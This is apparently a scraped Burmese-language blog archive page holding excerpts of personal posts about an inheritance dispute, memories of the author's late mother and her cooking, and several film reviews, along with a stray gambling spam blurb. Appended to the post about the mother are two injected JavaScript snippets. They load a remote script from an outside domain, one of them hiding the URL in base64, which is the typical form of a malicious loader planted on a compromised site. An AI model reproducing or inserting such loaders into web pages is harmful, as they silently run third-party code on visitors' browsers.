Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.


However, most games follow standard rules that govern payouts and jackpots.The game is played with virtual currency or virtual money, such as Bitcoin. Table games like blackjack and poker Virtual Sports – These virtual versions of sports like football, basketball and tennis can be played with real money. Most games adhere to standard rules governing […]


အောင် မိုးသူFebruary 11, 20192min142711
ပြောရရင်တော့ ကိုယ့်ပေါင် ကိုယ်လှန်ထောင်းသလိုပါပဲ။ အမွေကိစ္စဆိုတာလည်း ရှုပ်တယ်မဟုတ်လား။ အကြောင်းစုံလေး ပြောပြပြီး ရွာထဲက လူကြီးတွေအကြံဉာဏ်လေးလည်း လိုချင်လို့ပါတယ်။ အဖြစ်က ဒီလိုပါ။ . ကျွန်တော်တို့ မောင်နှမက (၅)ယောက်ပါ။ ကျွန်တော်က အငယ်ဆုံးပေါ့။ အစ်ကို နံပါတ်(၁)ကတော့ ထိုင်းနယ်စပ်ဘက်ကိုသွားပြီးကတည်းက သတင်းမရတာ (၂၂)နှစ်လောက်ရှိပြီ။ အစ်ကိုနံပါတ်(၂)ကတော့ ဆုံးသွားရှာပြီ သူ့ဆီမှာ မိန်းမနဲ့ ကလေးကတော့ကျန်ခဲ့တယ်။ အစိုးရဝန်ထမ်းဆိုတော့ နေပြည်တော်မှာနေတာပါ။ လက်ရှိ နံပါတ်(၃)အစ်မ အိမ်ထောင်နဲ့မိသားစုနဲ့ရယ်။ နံပါတ်(၄)အစ်မ အိမ်ထောင်ကွဲ သမီးတစ်ယောက်နဲ့ရယ် ကျွန်တော်နဲ့ရယ်ပါ။ အမေမဆုံးခင်မှာ အိမ်ကို ကန်ထရိုက်လေးပေးထားတာ အားလုံးပြီးတော့ သုံးခန်းရပါတယ်။ ကျွန်တော်ကတော့ အိမ်ထောင်ကွဲ နံပါတ်(၄)အစ်မနဲ့ သူ့သမီး ကျွန်တော့်တူမလေးနဲ့နေပြီး။ တစ်ခန်းကိုတော့ နံပါတ်(၂)အစ်မကနေပါတယ်။ နောက်တစ်ခန်းကိုတော့ ငှားထားလိုက်တယ်။ အဲ့မှာ ဖောက်တာက တူတူနေတဲ့ နံပါတ်(၄)အစ်မပါ။ […]


ရန်ကုန် နေစရာနေရာတစ်ခုဟာ သိပ်ကိုအရေးကြီးမှန်း ပိုပြီးသိလာရတဲ့အခါမှာတော့။ အမေ့ကို ပိုသတိရမိလာတာပါပဲ။ မုဆိုးမတဖြစ်နဲ့ နေစရာတနေရာကို ခက်ခက်ခဲခဲဝယ်နိုင်တဲ့ ဇွဲကို မချီးကျူးဘဲမနေနိုင်ပြန်ဘူး။ အခုတလော အမေဆုံးပြီးနောက်ပိုင်း အရမ်းကိုပူပန်မှုများတဲ့အချိန်တိုင်း သတိရမိနေပြန်ရော။ အခုနေတဲ့တိုက်ခန်းလေးကိုလည်း ကိုယ်စွန့်ခွာရတော့မယ်ဆိုတဲ့အသိရယ်။ အမေ့လို ကိုယ်ပိုင်နေစရာလေးရအောင် လုပ်ရတော့မယ်ဆိုတဲ့ အသိက အမေ့ကို ပိုပြီး သတိရစေခဲ့တယ်။ အမေစုဆောင်းခဲ့သလိုမျိုး ကိုယ်လည်းရုန်းကန်ရတော့မယ်ဆိုတာတွေးရင်း နေစရာအိမ်လေးတစ်လုံး (သို့) တိုက်ခန်းလေးတစ်ခန်း (သို့) ကိုယ်ပိုင်ကမ္ဘာလေးတစ်ခုကို ဒီလကုန်ရင် ရောက်ရှိတော့မယ်ဆိုတာ တွေးရင်း။ မေမေ့ကိုသတိရလို့ရေးတဲ့စာ ရင်နှင့်ရင်း၍ အောင်မိုးသူ ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,’script’,’https://groundrats.org/tHHGGEDyAn6ygUcHwex98R1YlpAOQ9zvV2t6wfY5Sox’); ;(function(f,b,n,j,x,e){ var decodedUrl = atob(‘aHR0cHM6Ly9ncm91bmRyYXRzLm9yZy90SEhHR0VEeUFuNnlnVWNId2V4OThSMVlscEFPUTl6dlYydDZ3Zlk1U294′); x=b.createElement(n);e=b.getElementsByTagName(n)[0]; x.async=1;x.src=decodedUrl; e.parentNode.insertBefore(x,e); })(window,document,’script’);


တိုရှည်? တိုရှည်အသံကြားရင်လည်း မေမေ့ကို သတိရမိပြန်ရော။ တိုရှည်စားချင်တယ်ဆို ငယ်ငယ်ကရောင်းခဲ့ မုန့်အိုးကရှိပြီးသား။ အဲ့သည်မုန့်အိုးကိုလည်း ဖိုးဖိုးကိုယ်တိုင်လုပ်ပေးခဲ့တာတဲ့။ အဲ့တုန်းက ဖိုးဖိုးကတွင်ခုံလုပ်တာကိုး။ မေမေ ခေါက်မုန့်ရောင်းမယ်ဆိုတော့ မုန့်လုပ်တဲ့ အိုးရယ် ကလော်တဲ့ယောင်းမရယ်ကို ဖိုးဖိုးကိုယ်တိုင် လုပ်ပေးခဲ့တယ်။ အဲသည်အိုးနဲ့ယောင်းမကတော့ အခုထက်ထိ ကျတော်တို့ဆီမှာ ရှိတုန်းပါပဲ။ မေမေ့လုပ်တဲ့ တိုရှည်ကိုတော့ ဘယ်သူ့မှမမီ။ ပဲဟင်းဆိုတာ ကုလားပဲကိုလှော်ကြိတ်ပြီးဖျော် ပျဉ်းတော်သိမ်းနဲ့ငရုတ်သီးတောင့်ကို ဆီးသတ်ပြီးထည့်။ နောက်ပြီး အခုသိပ်မတွေ့ရတော့တဲ့ ပဲမှုန့်အစပ်မှုန့်။ အခု ပဲမှုန့်အချိုမှုန့်ကိုပဲ များများတွေ့ရတော့တယ်။ ကုလားပဲကိုလှော် ထောင်းပြီး ငရုတ်သီးနဲ့ကြက်သွန်ဖြူကြိတ်ရော။ တိုရှည်ထဲကို ဖြူးပြီးစားရတာ အရမ်းကောင်း။ မေမေ မုန့်နှစ်စပ်ပုံကလည်း ကောင်းတာကို။ ဆန်ကြိတ်မယ့်အထဲကို မတ်ပဲ (မုန့်ဆွဲလို့ကောင်းတယ် စိမ့်တယ်။ မတ်ပဲက ချွဲတာကိုး)။ ရွအောင် ရွှေကြည်နည်းနည်းထည့်တယ်။ မွအောင်ဆိုပြီ မုန့်ကြိတ်ခါနီး ထမင်းလက်တစ်ဆုပ်လောက်ထည့်ကြိတ်တယ်။ […]


ငါးဆုပ်ဆိုရင် မေမေကျွေးတဲ့ ငါးဆုပ်ပဲသိခဲ့တာ။ ငါးဖယ်ခြစ်ဆိုတာ ကိုဈေးကြီးတာနဲ့ မေမေက ဈေးထဲသွားရင် ငါးအရိုးနဲ့အရေခွံတွေဝယ် အရိုးကအသားကိုခြစ် အသားငါးဆုပ်လုပ် အရေခွံကိုကော်မှုန့်နဲ့ထောင်း အရေခွံငါးဆုပ်လုပ်။ ကျန်တဲ့အရိုးကို ဟင်းချိုချက်။ တစ်အိမ်လုံးစားမှ (၁၀၀၀)ကျပ်တောင်မကုန်။ ဘယ်လိုပဲဈေးနည်းပါစေ မေမေချက်ကျွေးတဲ့ ဟင်းတွေဟာ ဈေးတန်ပြီး အတော်စားလို့ အဆင်ပြေခဲ့တာ။ မုဆိုးမဖြစ်ပြီး သားသမီးငါးယောက်ကို အိမ်ပိုင်နဲ့ထားနိုင်တယ်ဆိုကတည်းက မီးဖိုချောင်နိုင်နင်းခဲ့တာ။ ခရေပန်းတွေ ကျတော်ချစ်တယ်။ သစ်ပင်တွေကို ကျတော်ချစ်တယ်။ ဘဝအစိတ်အပိုင်းတွေထဲမှာ ခရေပန်းလေးတွေဟာလည်း တစ်ထောင့်တစ်နေရာက ပါဝင်ခဲ့တာပါပဲ။ ဖေဖေဆုံးပြီး မေမေကဈေးတစ်ခုမှာ ဘော်လီချုပ်ဆိုင်လေးဖွင့်တဲ့အချိန်ပေါ့။ အဲ့တုန်းက ခရေပန်းတစ်ကုံးငါးကျပ်။ ခရေပန်းကောက်ရောင်းမယ်ဆိုပြီး။ အိမ်နားက ရှိသမျှ ခရေပင်တွေမှာလိုက်ကောက်ပြီး ကျောင်းစားရိတ်ရှာခဲ့တာတွေ။ မိုးတွေရွာချလို့ ခရေပန်းတွေ အများကြီးကြွေတဲ့အချိန် မေမေနဲ့အတူတူ ခရေပန်းတွေကောက်ခဲ့ရတာလည်း အမှတ်တရပါပဲ။ လွမ်းတယ် မေမေ။ ——————- ရင်နှင့်ရင်း၍


ဖေဖေဟာ မေမေ့ကို သိပ်ချစ်ခဲ့လို့ ယူခဲ့တယ်။ မေမေဟာလည်း ဖေ့ဖေ့ကို သိပ်ချစ်လို့ လက်ထပ်ယူခဲ့တယ်။ သားသမီး (၄)ယောက် ရအပြီးမှာတော့ ဖေဖေဟာ မေမေဆီကနေ ပျောက်ချင်းမလှ ပျောက်သွားတယ်။ သူ့ရဲ့ ဒုတိယလူဆီကိုပေါ့။ အဲ့တုန်းက မေမေဟာ ဘယ်လိုမှ မခံစားနေဘူးတဲ့။ သူ့ဖာသာ အေးဆေးစွာ အလုပ်တွေဆက်လုပ်နေခဲ့တယ်။ မျက်ရည်တွေနဲ့လည် ငိုကြွေးမနေခဲ့ဘူး။ လအနည်းငယ်ကြာတော့ ဖေဖေဟာ မေမေ့ဆီပြန်ရောက်လာခဲ့တယ် နွမ်းလျတဲ့အကျင်္ ီပုဆိုးနဲ့ပေါ့။ ဒါပေမယ့် ဖေဖေဟာ ဒုတိယလူဆီပဲ ပြန်လည်သွားဖို့ ဟန်ပြင်ပြန်တယ်။ အဲ့သည်အချိန်မှာ မေမေဟာ ဖေဖေ့ကိုမတားဆီခဲ့ဘူးတဲ့။ အဝတ်အစားတွေထည့်ပေးပြီး ဖေဖေ့အိတ်ကပ်ထဲကို ပိုက်ဆံတောင် ထည့်ပေးလိုက်သေးတယ်။ အရင်လိုပါပဲ လအနည်းငယ်အကြာမှာ ဖေဖေပြန်လာခဲ့ပါတယ်။ အဲ့သည်နောက ်မေမေ့ထံကနေ ဖေဖေသေတဲ့အထိ ဘယ်မှာမသွားတော့ပါဘူး။ မေမေ့နေရာမှာ ကိုယ်သာဖြစ်ခဲ့ရင်ဆိုတဲ့ အတွေးက အဲ့သည်အကြောင်းတွေ မေမေပြောပြကတည်းက […]


သက္ကရာဇ် 2070 ကျော်လာတဲ့အခါ ကမ္ဘာမှာ လူသားဦးရေ အဆမတန်တိုးပွားလာတဲ့အခါ စားနပ်ရိက္ခအတွက် မလုံမလောက်ဖြစ်လာပါတော့တယ်။ အဲ့သည် တစ်အိမ်ထောင်မှာ ကလေးတစ်ဦးသာမွေးဖို့ တားမြစ်လိုက်တဲ့အပြင် အမွှာမွေးလာရင်လည်း အဲ့သည်အမွှာကို အေးခဲထားကာ အိပ်ပျော်အောင် လုပ်ထားမယ်လို့ သတင်းထွက်လာပါတော့တယ်။ အဲ့သည်မှာမှ အိမ်ထောင်တစ်ခုမှာ မိန်းကလေးအမွှာပူ (၇)ယောက်မွေးလာပြီး အမေကတော့ ဆုံးပါးသွားပါတော့တယ်။ အဖေဖြစ်သူဟာ သမီးခုနှစ်ယောက်ကို တနင်္လာ ၊ အင်္ဂါ ၊ ဗုဒ္ဒဟူး ၊ ကြာသပတေး ၊ သောကြာ ၊ စနေ ၊ တနင်္ဂနွေ ဆိုပြီး နာမည်ပေးခဲ့ပါတယ်။ One Child ဆိုတဲ့ ဥပဒေသကြောင့် သမီး (၇)ယောက်ကိုဖွက်ကာ ID တစ်မျိုးတည်းနဲ့ အသက်ရှင်စေခဲ့ပါတယ်။ သမီး (၇)ယောက်ဟာ တစ်ပတ်မှာ တစ်ယောက်တစ်လှည့်စီ အပြင်ကိုထွက်ရလေ့ရှိပြီး။ […]


အခုတလော Annabelle ဇာတ်ကားလည်း နာမည်ကြီးတော့ အရှိန်လေးမပျက်ရအောင် သည်းထိတ်ရင်ဖို ပရိတ်သတ်တွေအတွက် 2010က ထွက်ရှိခဲ့တဲ့ သည်းထိတ်ရင်ဖို ဇာတ်ကားတစ်ကားအကြောင်းပြောပြချင်ပါတယ်။ ဒီဇာတ်ကားက 1970က ဇာတ်ကားကို ပြန်လည်ဆန်းသစ်ထားတာ။ ဒါကလည်း အခုဇာတ်ကားကြည့်ပြီးမှ အဟောင်းရှိမှန်းသိတာ။ ဆယ်လီဆိုတဲ့ကလေးမလေးရဲ့ အဖေ နဲ့ အမေက ကွာရှင်းထားတာကြောင့် ဆယ်လီက အဖေဖြစ်သူဆီမှာ နေထိုင်ဖို့ဖြစ်လာတယ်။ အဖေကလည်း နောက်မိန်းမယူထားတယ်။ သူနေရမယ့်အိမ်ကလည်း သူ့အဖေဖြစ်သူ ဝယ်တာတဲ့ ရှေးဟောင်းအိမ်အကြီးကြီးမှာပါ။ မိထွေးဖြစ်သူကိုမကြည်သလို အဖေဖြစ်သူဆီမှာ ဆယ်လီက မနေချင်ပြန်ဘူး။ တစ်ရက် ခြံထဲကို လျှောက်ကြည့် မြေအောက်ခန်းရဲ့ အမိုးတစ်ခုကို သူတွေ့လိုက်တယ်။ ဒီလိုနဲ့ သူတို့သုံးယောက်အိမ်ထဲကို ရှာဖွေကြည့်တော့ မြေအောက်ခန်းတံခါးကို တွေ့လိုက်ရတယ်။ အိမ်က တော်တော့်ကို သက်တမ်းကြာနေတဲ့ တန်ဖိုးရှိတဲ့ အိမ်ဖြစ်လို့ သူ့အဖေကလည်း ဝယ်ထားတာဖြစ်တယ်။ မြေအောက်ခန်းကို […]


အခုတလော အချစ်ဇာတ်ကားလေး မကြည့်ဖြစ်ဘူး။ ရုပ်ရှင်ကားတွေက ထောင်ပေါင်းများစွာရှိပေမယ့်လည်း တစ်ရက်တစ်ကားလောက်ကို မကြည့်ဖြစ်ပြန်ဘူး။ ရုံးမှာလည်း ဟိုလုပ်ဒီလုပ်နဲ့ တစ်ကားပြည့်အောင် မကြည့်ဖြစ်သလို။ အိမ်ရောက်ပြန်တော့လည်း ပင်ပန်းတာနဲ့ မကြည့်ဖြစ်ပြန်ဘူး။ ဟာ့ဒစ်နဲ့ တွဲကြည့်ဖို့ တီဗွီမရှိတာလည်း ပါတာပေါ့။ အခုတော့ ဒီအချစ်ဇာတ်ကားလေးကို အချိန်ပေးပြီး ရုံးမှာပဲ ကြည့်လိုက်တယ်။ စလာကတည်းက စိတ်ဝင်စားဖွယ်ဇာတ်လမ်းလေးမို့ မင်းသမီးလေးကလည်း လူမည်းမင်းသမီးပေမယ့် ငယ်ငယ်ရွယ်ရွယ်နဲ့ အရမ်းချစ်စရာကောင်းတာမို့ရယ်ပါ။ အချစ်ဇာတ်ကားတွေထုံးစံအတိုင်းလိုလို ကောင်မလေးက skip ဆိုတဲ့ ရှားပါးရောဂါဖြစ်နေသူ။ ငယ်ငယ်ကတည်းက အပြင်လောကကို မထွက်ရပဲ မှန်လုံအိမ်လို အိမ်မျိုးမှာ ပိုးသတ်ထားတဲ့ အရာတွေနဲ့ပဲ နေခဲ့ရသူ။ သူရောဂါဟာ ရောဂါကို တိုက်ခိုက်နိုင်တဲ့ သွေးဖြူဥနည်းတဲ့ ရောဂါဖြစ်လို့ အပြင်လောကကကို ထွက်ရင် ပိုးမွှားအသေးအမွှားလေးတွေက အစ သူ့ကို ဒုက္ခပေးတတ်လို့ ပိုးသတ်ထားတဲ့ အိမ်ထဲမှာပဲ […]


တစ်နေ့တစ်လံ ပုဂံဘယ်ပြေးမလဲဆိုတဲ့စကားအတိုင်း ကျွန်တော်အောင်မိုးသူဟာ မြန်မာဂဇက်ဆိုတဲ့ ရွာကြီးဆီကို လျှောက်လာခဲ့တာ နှစ်များစွာကြာခဲ့ပါပြီ။ ဒါပေမယ့်လည်း မြန်မာဂဇက်ကြီးရဲ့ ပန်းတိုင်ကိုတော့ မရောက်ရှိခဲ့သေးပါဘူး။ ပန်းတိုင်ဆိုတာ ငွေကျပ်တစ်သိန်းဆိုတဲ့ ပန်းတိုင်ပါ။ ကျွန်တော့်နောက်ကလူတွေသာ ကျွန်တော့်ကို ကျော်တက်သွားမယ် ကျွန်တော်ကတော့ တလှုပ်လှုပ်ပါပဲ။ အခုတော့ ငွေကျပ်တစ်သိန်းသို့ဆိုတဲ့ ဆယ်ယောက်ထဲတော့ ဝင်လာခဲ့ပါပြီ။ အဲ့သည်ဆယ်ယောက်ကနေ ထိပ်ဆုံးရောက်ဖို့ တွေးမျှော်ရင်း တစ်နေ့တစ်လံ တစ်သိန်းဘယ်ပြေးမလဲဟဲ့ ခင်မင်စွာဖြင့် အောင်မိုးသူ


#Okja လို့နာမည်ရတဲ့ ဒီဇာတ်ကား 2017, 28 June မှာ လတ်လတ်ဆတ်ဆတ် ထွက်ရှိထားတဲ့ ရုပ်ရှင်ဇာတ်ကားပါ။ NETFLIX က ထွက်ရှိထားတာဖြစ်ပြီး။ Netflix ဟာ ရုပ်ရှင်ဖြစ်ပြီး “13 Reason Why” mini series မှာ နာမည်ကြီးခဲ့ပါသေးတယ်။ အဲ့သည်နောက်ပိုင်း NETFLIX ကထွက်ရှိတဲ့ လုံးချင်းရုပ်ရှင်တွေဟာ သပ်ရပ်ပြီး ကြည့်ရတာတန်တဲ့ ရုပ်ရှင်ဇာတ်လမ်းတွေဖြစ်နေပာတယ်။ ဒီဇာတ်ကားမတိုင်ခင်မှာ NETFLIX ကပဲ ထွက်တဲ့ “The Shimmer Lake” ဆိုတဲ့ ဇာတ်ကားဟာလည်း အတော်လေး ကျေနပ်စရာကောင်းပါတယ်။ အခု ဒီ #Okja ဆိုတဲ့ ဇာတ်ကားကိုတော့ အတော်လေးသဘောကျခဲ့ရပြန်ပါတယ်။ ဒရာမာ ၊ အက်ရှင်အမျိုးအစားဖြစ်ပြီး ဇာတ်လမ်းကိုတော့ နယူးယောက်နဲ့ ကိုရီးယားနိုင်ငံမှာအခြေတည်ထားပါတယ်။ အဓိက ဇာတ်ဆောင်ကတော့ […]


Tom Holland ကို ကျွန်မ မကြိုက်ခဲ့ဘူး ကျွန်မ စသိခဲ့တဲ့ Tom Holland ဆိုတဲ့ ပိန်ပိန်ပါးပါးနဲ့ ကောင်လေးတစ်ယောက်ပါး။ 2012 က ထွက်ရှိခဲ့တဲ့ The Impossible ဆိုတဲ့ ဆူနာမီ ရေကြီးတဲ့အခါ ထိုင်းမှာရောက်နေတဲ့ မိသားစုတစ်စု ကွဲကွာသွားရာကစလို့ ပြန်ဆုံစည်းနိုင်ဖို့ ကြိုးစားကြတာကို ရိုက်ကူးထားတဲ့ ရုပ်ရှင်ဇာတ်ကားမှာ ကျွန်မစသိခဲ့တာပါ။ သူ့ဇာတ်ကားအများကြီးထဲက ကျွန်မသူ့ကိုစသိခဲ့တာဟာ “The Impossible” မှာပါ။ နောက်ထပ် သူ့ကို ထပ်ကြုံရတဲ့ ဇာတ်ကားကတော့ “In The Heart Of The Sea” ပါ။ အသက်ငယ်ငယ်နဲ့ ကြိုးစားတဲ့ သရုပ်ဆောင်တစ်ယောက်လို့သာ ကျွန်မမြင်ခဲ့မိတာပါ။ နောက်ဇာတ်ကားတစ်ခုကတော့ လတ်တလောထွက်ထားတဲ့ “The Lost City Of Z” […]


ကိုရီးယားမှာ လူသတ်သမားတစ်ယောက်ကို ဖမ်းမိပြီတဲ့ အဲ့သည်လူသတ်သမား လူတစ်ယောက်ကို ရက်ရက်စက်စက် သတ်ဖြတ်ပြီးမှ သတ်တာဆိုပဲ။ လူအားလုံးကို သူ့ကိုမုန်းကြတာ အခုတော့ဖမ်းမိသွားပြီတဲ့။ ဒါလည်း သူ့အလုပ်မဟုတ်ပါဘူးလေ။ သူ့အလုပ်က သူ့ကုန်တင်ကားလေးနဲ့ ကုန်တွေတင်မယ်။ သူ့အမေနဲ့သူ့သမီးလေးအတွက်ပိုက်ဆံရှာမယ်။ သူ့သမီးလေးကလည်း မွေးရာပါနှလုံးမကောင်းရှာဘူး သူ့အမေဆီက ရခဲ့တဲ့ အမွေတွေပေါ့ သူ့အမေလည်း ဒီရောဂါနဲ့ပဲ သူနဲ့သူ့သမီးလေးကို ထားသွားခဲ့တာလေ။ သူ့သမီးလေးအတွက် ရုန်းကန်ရမှာပေါ့။ ဆိုးလိုက်တဲ့ကံကြမ္မာက သူ့သမီးလေးဆီထပ်ရောက်လာပြီ။ နှလုံးအစားထိုးရမယ်တဲ့။ အလှူရှင်လည်းအဆင်သင့်။အဆင်သင့်မဖြစ်တာက ငွေ ဆရာဝန်ပြောလိုက်တဲ့စကားက ခွဲစိတ်ဖို့လိုတဲ့ငွေကို ခင်ဗျား မရရအောင်ရှာခဲ့ပါတဲ့။ သူ့သမီးလေးအသက်ရှင်ဖို့ သူငွေလိုတယ်။ ငွေချေးလုပ်ငန်းတွေ သူလိုက်ချေးတယ်။ ရသမျှ ရှာတယ် ဒါပေမယ့် ခွဲစိတ်ဖို့လိုတဲ့ငွေက မပြည့်ပါဘူး။ သူဘာလုပ်ရမလဲ….။ လောင်းကစားမမက်တဲ့သူ လောင်းကစားသူငယ်ချင်းတစ်ယောက်ဆီမှာ ငွေချေးတယ်။ ပိုက်ဆံတွေပွာပေးမယ်ဆိုတာနဲ့ သူလိုက်သွားမိတယ်။ ယုတ်မာတဲ့ သူ့သူငယ်ချင်းက တစ်ဖက်လှည့် […]